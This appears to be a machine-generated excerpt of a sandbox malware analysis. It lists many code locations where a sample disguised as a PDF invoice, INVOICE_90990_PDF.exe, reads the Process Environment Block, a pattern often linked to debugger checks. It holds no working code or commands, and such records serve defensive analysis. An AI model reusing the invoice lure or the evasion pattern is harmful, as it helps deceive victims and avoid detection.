Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA2073 mov eax, dword ptr fs:[00000030h]	2_2_00CA2073
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB1074 mov eax, dword ptr fs:[00000030h]	2_2_00CB1074
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]	2_2_00C67016
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]	2_2_00C67016
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]	2_2_00C67016
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]	2_2_00CB4015
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]	2_2_00CB4015
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]	2_2_00C1002D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]	2_2_00C1002D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]	2_2_00C1002D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]	2_2_00C1002D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]	2_2_00C1002D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C741E8 mov eax, dword ptr fs:[00000030h]	2_2_00C741E8
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0C182 mov eax, dword ptr fs:[00000030h]	2_2_00C0C182
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1A185 mov eax, dword ptr fs:[00000030h]	2_2_00C1A185
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12990 mov eax, dword ptr fs:[00000030h]	2_2_00C12990
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00BEB1E1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00BEB1E1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00BEB1E1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C669A6 mov eax, dword ptr fs:[00000030h]	2_2_00C669A6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]	2_2_00C161A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]	2_2_00C161A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]	2_2_00C651BE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]	2_2_00C651BE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]	2_2_00C651BE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]	2_2_00C651BE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]	2_2_00C0B944
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]	2_2_00C0B944
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]	2_2_00BE9100
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]	2_2_00BE9100
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]	2_2_00BE9100
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]	2_2_00BEB171
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]	2_2_00BEB171
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEC962 mov eax, dword ptr fs:[00000030h]	2_2_00BEC962
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120 mov ecx, dword ptr fs:[00000030h]	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]	2_2_00C1513A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]	2_2_00C1513A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12ACB mov eax, dword ptr fs:[00000030h]	2_2_00C12ACB
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]	2_2_00BFAAB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]	2_2_00BFAAB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00BE52A5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00BE52A5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00BE52A5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00BE52A5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]	2_2_00BE52A5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12AE4 mov eax, dword ptr fs:[00000030h]	2_2_00C12AE4
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]	2_2_00C1D294
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]	2_2_00C1D294
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1FAB0 mov eax, dword ptr fs:[00000030h]	2_2_00C1FAB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C74257 mov eax, dword ptr fs:[00000030h]	2_2_00C74257
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]	2_2_00BEAA16
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]	2_2_00BEAA16
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]	2_2_00C9B260
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]	2_2_00C9B260
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB8A62 mov eax, dword ptr fs:[00000030h]	2_2_00CB8A62
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]	2_2_00BE5210
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE5210 mov ecx, dword ptr fs:[00000030h]	2_2_00BE5210
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]	2_2_00BE5210
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]	2_2_00BE5210
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF8A0A mov eax, dword ptr fs:[00000030h]	2_2_00BF8A0A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C2927A mov eax, dword ptr fs:[00000030h]	2_2_00C2927A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C03A1C mov eax, dword ptr fs:[00000030h]	2_2_00C03A1C
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]	2_2_00C24A2C
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]	2_2_00C24A2C
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]	2_2_00BE9240
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]	2_2_00BE9240
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]	2_2_00BE9240
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]	2_2_00BE9240
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]	2_2_00C653CA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]	2_2_00C653CA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]	2_2_00C103E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0DBE9 mov eax, dword ptr fs:[00000030h]	2_2_00C0DBE9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]	2_2_00BF1B8F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]	2_2_00BF1B8F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA138A mov eax, dword ptr fs:[00000030h]	2_2_00CA138A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C9D380 mov ecx, dword ptr fs:[00000030h]	2_2_00C9D380
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1B390 mov eax, dword ptr fs:[00000030h]	2_2_00C1B390
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12397 mov eax, dword ptr fs:[00000030h]	2_2_00C12397
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]	2_2_00C14BAD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]	2_2_00C14BAD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]	2_2_00C14BAD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB5BA5 mov eax, dword ptr fs:[00000030h]	2_2_00CB5BA5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB8B58 mov eax, dword ptr fs:[00000030h]	2_2_00CB8B58
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]	2_2_00C13B7A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]	2_2_00C13B7A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA131B mov eax, dword ptr fs:[00000030h]	2_2_00CA131B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEDB60 mov ecx, dword ptr fs:[00000030h]	2_2_00BEDB60
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEF358 mov eax, dword ptr fs:[00000030h]	2_2_00BEF358
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEDB40 mov eax, dword ptr fs:[00000030h]	2_2_00BEDB40
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB8CD6 mov eax, dword ptr fs:[00000030h]	2_2_00CB8CD6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF849B mov eax, dword ptr fs:[00000030h]	2_2_00BF849B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA14FB mov eax, dword ptr fs:[00000030h]	2_2_00CA14FB
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00C66CF0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00C66CF0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]	2_2_00C66CF0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1A44B mov eax, dword ptr fs:[00000030h]	2_2_00C1A44B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]	2_2_00C7C450
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]	2_2_00C7C450
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0746D mov eax, dword ptr fs:[00000030h]	2_2_00C0746D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]	2_2_00CB740D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]	2_2_00CB740D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]	2_2_00CB740D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]	2_2_00CA1C06
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]	2_2_00C66C0A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]	2_2_00C66C0A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]	2_2_00C66C0A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]	2_2_00C66C0A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1BC2C mov eax, dword ptr fs:[00000030h]	2_2_00C1BC2C
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov ecx, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]	2_2_00C66DC9
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00BE2D8A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00BE2D8A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00BE2D8A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00BE2D8A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]	2_2_00BE2D8A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C98DF1 mov eax, dword ptr fs:[00000030h]	2_2_00C98DF1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]	2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]	2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]	2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]	2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]	2_2_00C1FD9B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]	2_2_00C1FD9B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]	2_2_00BFD5E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]	2_2_00BFD5E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C135A1 mov eax, dword ptr fs:[00000030h]	2_2_00C135A1
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]	2_2_00CB05AC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]	2_2_00CB05AC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00C11DB5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00C11DB5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]	2_2_00C11DB5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C23D43 mov eax, dword ptr fs:[00000030h]	2_2_00C23D43
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C63540 mov eax, dword ptr fs:[00000030h]	2_2_00C63540
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]	2_2_00BF3D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEAD30 mov eax, dword ptr fs:[00000030h]	2_2_00BEAD30
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C07D50 mov eax, dword ptr fs:[00000030h]	2_2_00C07D50
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]	2_2_00C0C577
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]	2_2_00C0C577
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C6A537 mov eax, dword ptr fs:[00000030h]	2_2_00C6A537
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]	2_2_00C14D3B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]	2_2_00C14D3B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]	2_2_00C14D3B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB8D34 mov eax, dword ptr fs:[00000030h]	2_2_00CB8D34
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C28EC7 mov eax, dword ptr fs:[00000030h]	2_2_00C28EC7
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C9FEC0 mov eax, dword ptr fs:[00000030h]	2_2_00C9FEC0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C136CC mov eax, dword ptr fs:[00000030h]	2_2_00C136CC
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB8ED6 mov eax, dword ptr fs:[00000030h]	2_2_00CB8ED6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C116E0 mov ecx, dword ptr fs:[00000030h]	2_2_00C116E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C7FE87 mov eax, dword ptr fs:[00000030h]	2_2_00C7FE87
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF76E2 mov eax, dword ptr fs:[00000030h]	2_2_00BF76E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C646A7 mov eax, dword ptr fs:[00000030h]	2_2_00C646A7
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00CB0EA5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00CB0EA5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00CB0EA5

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_004092F9 GetProcessHeap,

0_2_004092F9

